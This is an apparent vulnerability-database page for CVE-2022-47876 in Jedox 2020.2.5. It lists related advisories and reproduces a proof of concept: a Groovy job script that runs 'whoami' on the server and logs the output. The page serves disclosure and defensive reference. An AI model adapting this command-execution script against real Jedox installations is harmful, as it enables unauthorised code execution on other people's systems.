| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts Vulnerability | 5 May 202300:00 | – | zdt | |
| CVE-2022-47876 | 3 May 202300:30 | – | circl | |
| Jedox 安全漏洞 | 2 May 202300:00 | – | cnnvd | |
| CVE-2022-47876 | 2 May 202300:00 | – | cve | |
| CVE-2022-47876 | 2 May 202300:00 | – | cvelist | |
| EUVD-2022-50633 | 3 Oct 202520:07 | – | euvd | |
| CVE-2022-47876 | 2 May 202320:15 | – | nvd | |
| Jedox 2020.2.5 Groovy-Scripts Remote Code Execution | 5 May 202300:00 | – | packetstorm | |
| Design/Logic Flaw | 2 May 202320:15 | – | prion | |
| PT-2023-15508 · Jedox · Jedox | 2 May 202300:00 | – | ptsecurity |
# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
# Date: 28/04/2023
# Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47876
Introduction
=================
Jedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts. To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator.
Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
Proof of Concept
=================
1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following groovy script to execute `whoami`. The output of the command can be viewed in the logs:
def sout = new StringBuilder(), serr = new StringBuilder()
def proc = 'whoami'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(10000)
LOG.error(sout.toString());
LOG.error(serr.toString());Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation